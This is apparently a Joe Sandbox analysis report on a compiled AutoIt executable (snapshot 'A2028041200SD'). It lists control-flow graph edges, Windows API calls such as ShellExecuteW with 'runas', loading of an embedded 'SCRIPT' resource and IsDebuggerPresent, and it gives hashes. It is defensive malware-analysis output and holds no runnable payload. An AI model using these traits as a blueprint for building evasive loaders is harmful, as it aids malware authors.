library calls 88843->88935 88845 917b4c 88936 917e23 InitializeCriticalSectionAndSpinCount 88845->88936 88847 917b55 88937 917bbd 50 API calls 2 library calls 88847->88937 88848 917b51 88848->88847 88938 917e6d TlsAlloc 88848->88938 88851 917b67 88851->88847 88853 917b72 88851->88853 88852 917b5a 88852->88812 88939 916986 88853->88939 88856 917bb4 88947 917bbd 50 API calls 2 library calls 88856->88947 88859 917b93 88859->88856 88861 917b99 88859->88861 88860 917bb9 88860->88812 88946 917a94 47 API calls 4 library calls 88861->88946 88863 917ba1 GetCurrentThreadId 88863->88812 88865 91acbf _wprintf 88864->88865 88866 917cf4 __lock 47 API calls 88865->88866 88867 91acc6 88866->88867 88868 916986 __calloc_crt 47 API calls 88867->88868 88870 91acd7 88868->88870 88869 91ace2 _wprintf @_EH4_CallFilterFunc@8 88869->88816 88870->88869 88871 91ad42 GetStartupInfoW 88870->88871 88877 91ad57 88871->88877 88879 91ae80 88871->88879 88872 91af44 88956 91af58 LeaveCriticalSection _doexit 88872->88956 88874 91aec9 GetStdHandle 88874->88879 88875 916986 __calloc_crt 47 API calls 88875->88877 88876 91aedb GetFileType 88876->88879 88877->88875 88878 91ada5 88877->88878 88877->88879 88878->88879 88881 91ade5 InitializeCriticalSectionAndSpinCount 88878->88881 88882 91add7 GetFileType 88878->88882 88879->88872 88879->88874 88879->88876 88880 91af08 InitializeCriticalSectionAndSpinCount 88879->88880 88880->88879 88881->88878 88882->88878 88882->88881 88884 915ead 88883->88884 88885 922e8e 88883->88885 88890 922a7b GetModuleFileNameW 88884->88890 88957 9169d0 47 API calls std::exception::_Copy_str 88885->88957 88888 922eca FreeEnvironmentStringsW 88888->88884 88889 922eb4 ___crtGetEnvironmentStringsW 88889->88888 88891 922aaf _wparse_cmdline 88890->88891 88892 915eb7 88891->88892 88893 922ae9 88891->88893 88892->88824 88930 91115b 47 API calls 3 library calls 88892->88930 88958 9169d0 47 API calls std::exception::_Copy_str 88893->88958 88895 922aef _wparse_cmdline 88895->88892 88897 
922ccd __NMSG_WRITE 88896->88897 88901 922cc5 88896->88901 88898 916986 __calloc_crt 47 API calls 88897->88898 88906 922cf6 __NMSG_WRITE 88898->88906 88899 922d4d 88900 911c9d _free 47 API calls 88899->88900 88900->88901 88901->88827 88902 916986 __calloc_crt 47 API calls 88902->88906 88903 922d72 88905 911c9d _free 47 API calls 88903->88905 88905->88901 88906->88899 88906->88901 88906->88902 88906->88903 88907 922d89 88906->88907 88959 922567 47 API calls _W_expandtime 88906->88959 88960 916e20 IsProcessorFeaturePresent 88907->88960 88909 922d95 88909->88827 88911 9111a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 88910->88911 88913 9111e0 __IsNonwritableInCurrentImage 88911->88913 88975 910f0a 52 API calls __cinit 88911->88975 88913->88831 88915 8f3a29 88914->88915 88916 961ebf 88914->88916 88917 8f3a63 IsThemeActive 88915->88917 88976 911405 88917->88976 88921 8f3a8f 88988 8f3adb SystemParametersInfoW SystemParametersInfoW 88921->88988 88923 8f3a9b 88989 8f3d19 88923->88989 88925 8f3aa3 SystemParametersInfoW 88926 8f3ac8 88925->88926 88926->88835 88927->88809 88928->88813 88929->88820 88933->88836 88934->88839 88935->88845 88936->88848 88937->88852 88938->88851 88941 91698d 88939->88941 88942 9169ca 88941->88942 88943 9169ab Sleep 88941->88943 88948 9230aa 88941->88948 88942->88856 88945 917ec9 TlsSetValue 88942->88945 88944 9169c2 88943->88944 88944->88941 88944->88942 88945->88859 88946->88863 88947->88860 88949 9230d0 __calloc_impl 88948->88949 88950 9230b5 88948->88950 88953 9230e0 RtlAllocateHeap 88949->88953 88954 9230c6 88949->88954 88950->88949 88951 9230c1 88950->88951 88955 917c0e 47 API calls __getptd_noexit 88951->88955 88953->88949 88953->88954 88954->88941 88955->88954 88956->88869 88957->88889 88958->88895 88959->88906 88961 916e2b 88960->88961 88966 916cb5 88961->88966 88965 916e46 88965->88909 88967 916ccf _memset ___raise_securityfailure 88966->88967 88968 916cef IsDebuggerPresent 88967->88968 88974 9181ac 
SetUnhandledExceptionFilter UnhandledExceptionFilter 88968->88974 88970 91a70c __87except 6 API calls 88971 916dd6 88970->88971 88973 918197 GetCurrentProcess TerminateProcess 88971->88973 88972 916db3 ___raise_securityfailure 88972->88970 88973->88965 88974->88972 88975->88913 88977 917cf4 __lock 47 API calls 88976->88977 88978 911410 88977->88978 89041 917e58 LeaveCriticalSection 88978->89041 88980 8f3a88 88981 91146d 88980->88981 88982 911491 88981->88982 88983 911477 88981->88983 88982->88921 88983->88982 89042 917c0e 47 API calls __getptd_noexit 88983->89042 88985 911481 89043 916e10 8 API calls _W_expandtime 88985->89043 88987 91148c 88987->88921 88988->88923 88990 8f3d26 __ftell_nolock 88989->88990 88991 8fd7f7 48 API calls 88990->88991 88992 8f3d31 GetCurrentDirectoryW 88991->88992 89044 8f61ca 88992->89044 88994 8f3d57 IsDebuggerPresent 88995 961cc1 MessageBoxA 88994->88995 88996 8f3d65 88994->88996 88997 961cd9 88995->88997 88996->88997 88998 8f3d82 88996->88998 89028 8f3e3a 88996->89028 89169 90c682 48 API calls 88997->89169 89118 8f40e5 88998->89118 88999 8f3e41 SetCurrentDirectoryW 89002 8f3e4e Mailbox 88999->89002 89002->88925 89003 961ce9 89008 961cff SetCurrentDirectoryW 89003->89008 89008->89002 89028->88999 89041->88980 89042->88985 89043->88987 89171 90e99b 89044->89171 89048 8f61eb 89049 8f5374 50 API calls 89048->89049 89050 8f61ff 89049->89050 89051 8fce19 48 API calls 89050->89051 89052 8f620c 89051->89052 89188 8f39db 89052->89188 89054 8f6216 Mailbox 89055 8f6eed 48 API calls 89054->89055 89056 8f622b 89055->89056 89200 8f9048 89056->89200 89059 8fce19 48 API calls 89060 8f6244 89059->89060 89061 8fd6e9 55 API calls 89060->89061 89062 8f6254 Mailbox 89061->89062 89063 8fce19 48 API calls 89062->89063 89064 8f627c 89063->89064 89065 8fd6e9 55 API calls 89064->89065 89066 8f628f Mailbox 89065->89066 89067 8fce19 48 API calls 89066->89067 89068 8f62a0 89067->89068 89069 8fd645 53 API calls 89068->89069 89070 8f62b2 Mailbox 89069->89070 89071 
8fd7f7 48 API calls 89070->89071 89072 8f62c5 89071->89072 89203 8f63fc 89072->89203 89076 8f62df 89077 8f62e9 89076->89077 89078 961c08 89076->89078 89079 910fa7 _W_store_winword 59 API calls 89077->89079 89080 8f63fc 48 API calls 89078->89080 89081 8f62f4 89079->89081 89082 961c1c 89080->89082 89081->89082 89083 8f62fe 89081->89083 89085 8f63fc 48 API calls 89082->89085 89084 910fa7 _W_store_winword 59 API calls 89083->89084 89086 8f6309 89084->89086 89087 961c38 89085->89087 89086->89087 89088 8f6313 89086->89088 89089 8f5374 50 API calls 89087->89089 89090 910fa7 _W_store_winword 59 API calls 89088->89090 89091 961c5d 89089->89091 89092 8f631e 89090->89092 89093 8f63fc 48 API calls 89091->89093 89094 8f635f 89092->89094 89096 961c86 89092->89096 89099 8f63fc 48 API calls 89092->89099 89097 961c69 89093->89097 89095 8f636c 89094->89095 89094->89096 89101 90c050 48 API calls 89095->89101 89100 8f6eed 48 API calls 89096->89100 89098 8f6eed 48 API calls 89097->89098 89102 961c77 89098->89102 89103 8f6342 89099->89103 89104 961ca8 89100->89104 89105 8f6384 89101->89105 89106 8f63fc 48 API calls 89102->89106 89107 8f6eed 48 API calls 89103->89107 89108 8f63fc 48 API calls 89104->89108 89110 901b90 48 API calls 89105->89110 89106->89096 89111 8f6350 89107->89111 89109 961cb5 89108->89109 89109->89109 89115 8f6394 89110->89115 89112 8f63fc 48 API calls 89111->89112 89112->89094 89113 901b90 48 API calls 89113->89115 89115->89113 89116 8f63fc 48 API calls 89115->89116 89117 8f63d6 Mailbox 89115->89117 89219 8f6b68 48 API calls 89115->89219 89116->89115 89117->88994 89119 8f40f2 __ftell_nolock 89118->89119 89120 8f410b 89119->89120 89121 96370e _memset 89119->89121 89122 8f660f 49 API calls 89120->89122 89124 96372a GetOpenFileNameW 89121->89124 89123 8f4114 89122->89123 89261 8f40a7 89123->89261 89126 963779 89124->89126 89128 8f6a63 48 API calls 89126->89128 89129 96378e 89128->89129 89129->89129 89131 8f4129 89279 8f4139 89131->89279 89169->89003 89172 8fd7f7 48 API 
calls 89171->89172 89173 8f61db 89172->89173 89174 8f6009 89173->89174 89175 8f6016 __ftell_nolock 89174->89175 89176 8f6a63 48 API calls 89175->89176 89181 8f617c Mailbox 89175->89181 89178 8f6048 89176->89178 89186 8f607e Mailbox 89178->89186 89220 8f61a6 89178->89220 89179 8f61a6 48 API calls 89179->89186 89180 8f614f 89180->89181 89182 8fce19 48 API calls 89180->89182 89181->89048 89184 8f6170 89182->89184 89183 8fce19 48 API calls 89183->89186 89185 8f64cf 48 API calls 89184->89185 89185->89181 89186->89179 89186->89180 89186->89181 89186->89183 89187 8f64cf 48 API calls 89186->89187 89187->89186 89189 8f41a9 136 API calls 89188->89189 89190 8f39fe 89189->89190 89191 8f3a06 89190->89191 89223 93c396 89190->89223 89191->89054 89194 962ff0 89196 911c9d _free 47 API calls 89194->89196 89195 8f4252 84 API calls 89195->89194 89197 962ffd 89196->89197 89198 8f4252 84 API calls 89197->89198 89199 963006 89198->89199 89199->89199 89201 90f4ea 48 API calls 89200->89201 89202 8f6237 89201->89202 89202->89059 89204 8f641f 89203->89204 89205 8f6406 89203->89205 89207 8f6a63 48 API calls 89204->89207 89206 8f6eed 48 API calls 89205->89206 89208 8f62d1 89206->89208 89207->89208 89209 910fa7 89208->89209 89210 910fb3 89209->89210 89211 911028 89209->89211 89218 910fd8 89210->89218 89258 917c0e 47 API calls __getptd_noexit 89210->89258 89260 91103a 59 API calls 3 library calls 89211->89260 89214 911035 89214->89076 89215 910fbf 89259 916e10 8 API calls _W_expandtime 89215->89259 89217 910fca 89217->89076 89218->89076 89219->89115 89221 8fbdfa 48 API calls 89220->89221 89222 8f61b1 89221->89222 89222->89178 89224 8f4517 83 API calls 89223->89224 89225 93c405 89224->89225 89226 93c56d 94 API calls 89225->89226 89227 93c417 89226->89227 89228 8f44ed 64 API calls 89227->89228 89256 93c41b 89227->89256 89229 93c432 89228->89229 89230 8f44ed 64 API calls 89229->89230 89231 93c442 89230->89231 89232 8f44ed 64 API calls 89231->89232 89233 93c45d 89232->89233 89234 8f44ed 64 API calls 
89233->89234 89235 93c478 89234->89235 89236 8f4517 83 API calls 89235->89236 89237 93c48f 89236->89237 89238 91395c std::exception::_Copy_str 47 API calls 89237->89238 89239 93c496 89238->89239 89240 91395c std::exception::_Copy_str 47 API calls 89239->89240 89241 93c4a0 89240->89241 89242 8f44ed 64 API calls 89241->89242 89243 93c4b4 89242->89243 89244 93bf5a GetSystemTimeAsFileTime 89243->89244 89245 93c4c7 89244->89245 89246 93c4f1 89245->89246 89247 93c4dc 89245->89247 89248 93c4f7 89246->89248 89249 93c556 89246->89249 89250 911c9d _free 47 API calls 89247->89250 89251 93b965 118 API calls 89248->89251 89252 911c9d _free 47 API calls 89249->89252 89253 93c4e2 89250->89253 89255 93c54e 89251->89255 89252->89256 89254 911c9d _free 47 API calls 89253->89254 89254->89256 89257 911c9d _free 47 API calls 89255->89257 89256->89194 89256->89195 89257->89256 89258->89215 89259->89217 89260->89214 89262 91f8a0 __ftell_nolock 89261->89262 89263 8f40b4 GetLongPathNameW 89262->89263 89264 8f6a63 48 API calls 89263->89264 89265 8f40dc 89264->89265 89266 8f49a0 89265->89266 89267 8fd7f7 48 API calls 89266->89267 89268 8f49b2 89267->89268 89269 8f660f 49 API calls 89268->89269 89270 8f49bd 89269->89270 89271 962e35 89270->89271 89272 8f49c8 89270->89272 89276 962e4f 89271->89276 89319 90d35e 60 API calls 89271->89319 89274 8f64cf 48 API calls 89272->89274 89275 8f49d4 89274->89275 89313 8f28a6 89275->89313 89278 8f49e7 Mailbox 89278->89131 89280 8f41a9 136 API calls 89279->89280 89281 8f415e 89280->89281 89282 963489 89281->89282 89283 8f41a9 136 API calls 89281->89283 89284 93c396 122 API calls 89282->89284 89285 8f4172 89283->89285 89286 96349e 89284->89286 89285->89282 89287 8f417a 89285->89287 89288 9634a2 89286->89288 89289 9634bf 89286->89289 89291 8f4186 89287->89291 89292 9634aa 89287->89292 89293 8f4252 84 API calls 89288->89293 89290 90f4ea 48 API calls 89289->89290 89296 963504 Mailbox 89290->89296 89320 8fc833 89291->89320 89413 936b49 88 API calls _wprintf 
                                                                        (tail of the preceding control-flow graph edge list; the rendered graph was not captured in text. Nodes in this part of the list referenced SetCurrentDirectoryW, CloseHandle, GetStdHandle, CoInitialize, CreateThread, RegisterWindowMessageW, PostQuitMessage, SetTimer, KillTimer, CreatePopupMenu, DefWindowProcW, MoveWindow, SetFocus, Shell_NotifyIconW, DeleteObject, DestroyWindow, GetVersionExW, GetCurrentProcess, GetSystemInfo, GetNativeSystemInfo, LoadLibraryA, GetProcAddress, FreeLibrary, GetPEB and Sleep)

                                                                        Control-flow Graph
                                                                        • Graph for the function at 91b043-91b86c (rendered graph not captured in text; its edge list referenced GetConsoleMode, GetConsoleCP, WriteFile, GetLastError and WideCharToMultiByte)
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 00453e357cfab28cd2bbfd4af89b9f291f56ce2373450e7b79de4452d560b8de
                                                                        • Instruction ID: 2ebe094cd1730073b25902905db87bb66b2902dbb19abe4e2c7ba61b59734531
                                                                        • Opcode Fuzzy Hash: 00453e357cfab28cd2bbfd4af89b9f291f56ce2373450e7b79de4452d560b8de
                                                                        • Instruction Fuzzy Hash: 77326975B022298BDB248F14DD816E9B7BAFF4A310F5841D9E40AE7A91D7309EC0CF52

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,008F3AA3,?), ref: 008F3D45
                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,008F3AA3,?), ref: 008F3D57
                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,009B1148,009B1130,?,?,?,?,008F3AA3,?), ref: 008F3DC8
                                                                          • Part of subcall function 008F6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008F3DEE,009B1148,?,?,?,?,?,008F3AA3,?), ref: 008F6471
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,008F3AA3,?), ref: 008F3E48
                                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009A28F4,00000010), ref: 00961CCE
                                                                        • SetCurrentDirectoryW.KERNEL32(?,009B1148,?,?,?,?,?,008F3AA3,?), ref: 00961D06
                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0098DAB4,009B1148,?,?,?,?,?,008F3AA3,?), ref: 00961D89
                                                                        • ShellExecuteW.SHELL32(00000000,?,?,?,?,008F3AA3), ref: 00961D90
                                                                          • Part of subcall function 008F3E6E: GetSysColorBrush.USER32(0000000F), ref: 008F3E79
                                                                          • Part of subcall function 008F3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 008F3E88
                                                                          • Part of subcall function 008F3E6E: LoadIconW.USER32(00000063), ref: 008F3E9E
                                                                          • Part of subcall function 008F3E6E: LoadIconW.USER32(000000A4), ref: 008F3EB0
                                                                          • Part of subcall function 008F3E6E: LoadIconW.USER32(000000A2), ref: 008F3EC2
                                                                          • Part of subcall function 008F3E6E: RegisterClassExW.USER32(?), ref: 008F3F30
                                                                          • Part of subcall function 008F36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008F36E6
                                                                          • Part of subcall function 008F36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008F3707
                                                                          • Part of subcall function 008F36B8: ShowWindow.USER32(00000000,?,?,?,?,008F3AA3,?), ref: 008F371B
                                                                          • Part of subcall function 008F36B8: ShowWindow.USER32(00000000,?,?,?,?,008F3AA3,?), ref: 008F3724
                                                                          • Part of subcall function 008F4FFC: _memset.LIBCMT ref: 008F5022
                                                                          • Part of subcall function 008F4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008F50CB
                                                                        Strings
                                                                        • This is a third-party compiled AutoIt script., xrefs: 00961CC8
                                                                        • runas, xrefs: 00961D84
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                        • String ID: This is a third-party compiled AutoIt script.$runas
                                                                        • API String ID: 438480954-3287110873
                                                                        • Opcode ID: 765b09837ec272f930cacb933329537081c98e58ceb164e543dc2033c2ff920e
                                                                        • Instruction ID: 9534aa69d04fb7bf481c098052ddc6f5d9cbf0edac3cd8601417482cfc879a74
                                                                        • Opcode Fuzzy Hash: 765b09837ec272f930cacb933329537081c98e58ceb164e543dc2033c2ff920e
                                                                        • Instruction Fuzzy Hash: D8510531A0C24CBACB11ABBCDD61EFE7B79FF45B14F004264F341E2192DA7456459B22

                                                                        Control-flow Graph
                                                                        • Graph for the function at 90ddc0 (rendered graph not captured in text; its edge list referenced GetVersionExW, GetCurrentProcess, GetSystemInfo, GetNativeSystemInfo and FreeLibrary)
                                                                        APIs
                                                                        • GetVersionExW.KERNEL32(?), ref: 0090DDEC
                                                                        • GetCurrentProcess.KERNEL32(00000000,0098DC38,?,?), ref: 0090DEAC
                                                                        • GetNativeSystemInfo.KERNELBASE(?,0098DC38,?,?), ref: 0090DF01
                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0090DF0C
                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0090DF1F
                                                                        • GetSystemInfo.KERNEL32(?,0098DC38,?,?), ref: 0090DF29
                                                                        • GetSystemInfo.KERNEL32(?,0098DC38,?,?), ref: 0090DF35
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                        • String ID:
                                                                        • API String ID: 3851250370-0
                                                                        • Opcode ID: 53e575a9f1aff73a5f5468baf3291014b6cebcd0911bb04e25abe904bf5e7d72
                                                                        • Instruction ID: a51c9e0c5f9607c1796013f08955bd3abf00ac4d92c4548bac71a2e97ad02826
                                                                        • Opcode Fuzzy Hash: 53e575a9f1aff73a5f5468baf3291014b6cebcd0911bb04e25abe904bf5e7d72
                                                                        • Instruction Fuzzy Hash: CE61C57181B384DFCF15CFA898C11EDBFB4AF29300B1989D9D9459F247C624C949CB69

                                                                        Control-flow Graph
                                                                        • Graph for the function at 8f406b (rendered graph not captured in text; its edge list referenced CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource and LockResource)
                                                                        APIs
                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,008F449E,?,?,00000000,00000001), ref: 008F407B
                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008F449E,?,?,00000000,00000001), ref: 008F4092
                                                                        • LoadResource.KERNEL32(?,00000000,?,?,008F449E,?,?,00000000,00000001,?,?,?,?,?,?,008F41FB), ref: 00964F1A
                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,008F449E,?,?,00000000,00000001,?,?,?,?,?,?,008F41FB), ref: 00964F2F
                                                                        • LockResource.KERNEL32(008F449E,?,?,008F449E,?,?,00000000,00000001,?,?,?,?,?,?,008F41FB,00000000), ref: 00964F42
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                        • String ID: SCRIPT
                                                                        • API String ID: 3051347437-3967369404
                                                                        • Opcode ID: 6f71d4a71f268fa566529f7db64df75644decc7130bdf9e0b7d81462d07a65c5
                                                                        • Instruction ID: 4e5f895da99d1e058dc338e2bd28ef2cd681476ad81d817249f1a196af247755
                                                                        • Opcode Fuzzy Hash: 6f71d4a71f268fa566529f7db64df75644decc7130bdf9e0b7d81462d07a65c5
                                                                        • Instruction Fuzzy Hash: 4E115A71204705AFE7218B65EC48F277BB9EFC5B51F10412DF616D62A0DAB1EC41AA20
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?,00962F49), ref: 00936CB9
                                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00936CCA
                                                                        • FindClose.KERNEL32(00000000), ref: 00936CDA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                        • String ID:
                                                                        • API String ID: 48322524-0
                                                                        • Opcode ID: 1d735a3bbee452a9233f49857120ec77171a9cda8403ce687a402cdb1cd0d406
                                                                        • Instruction ID: d10b053ab55c9dd771f6c04ea538a3402c95f538cf3cdf53a3d0a42653bb80bc
                                                                        • Opcode Fuzzy Hash: 1d735a3bbee452a9233f49857120ec77171a9cda8403ce687a402cdb1cd0d406
                                                                        • Instruction Fuzzy Hash: 7EE0483282A5156782146738EC0D8E9777CDE0533AF504715F5F5C11D0E774E9449AE5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Exception@8Throwstd::exception::exception
                                                                        • String ID: @
                                                                        • API String ID: 3728558374-2766056989
                                                                        • Opcode ID: 8eda5575326629794551e3494c65d8df63d6496102a205af1ed1477dff74a96e
                                                                        • Instruction ID: 43ea6ef2318b1c711323bb9a42bbde4789fd68c7c1f01c33c16c1b3d29a31138
                                                                        • Opcode Fuzzy Hash: 8eda5575326629794551e3494c65d8df63d6496102a205af1ed1477dff74a96e
                                                                        • Instruction Fuzzy Hash: 8972AD70E04209DFDB14EF98C481ABEB7BAEF48304F14C45AEA15AB291D735AE45CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID:
                                                                        • API String ID: 3964851224-0
                                                                        • Opcode ID: b8761758a04d762f04a0d32fa1ffcb51973daebad5f42414da89533a36bf7f23
                                                                        • Instruction ID: f1f11f21cc876b5ba234806933c8f405ddfb64d41b898d2773cc0974ee5d77b9
                                                                        • Opcode Fuzzy Hash: b8761758a04d762f04a0d32fa1ffcb51973daebad5f42414da89533a36bf7f23
                                                                        • Instruction Fuzzy Hash: 459278706083419FD724DF18C494B2AB7E9FF88308F14885DE99A8B3A2D775ED45CB52
                                                                        APIs
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008FE959
                                                                        • timeGetTime.WINMM ref: 008FEBFA
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008FED2E
                                                                        • TranslateMessage.USER32(?), ref: 008FED3F
                                                                        • DispatchMessageW.USER32(?), ref: 008FED4A
                                                                        • LockWindowUpdate.USER32(00000000), ref: 008FED79
                                                                        • DestroyWindow.USER32 ref: 008FED85
                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008FED9F
                                                                        • Sleep.KERNEL32(0000000A), ref: 00965270
                                                                        • TranslateMessage.USER32(?), ref: 009659F7
                                                                        • DispatchMessageW.USER32(?), ref: 00965A05
                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00965A19
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
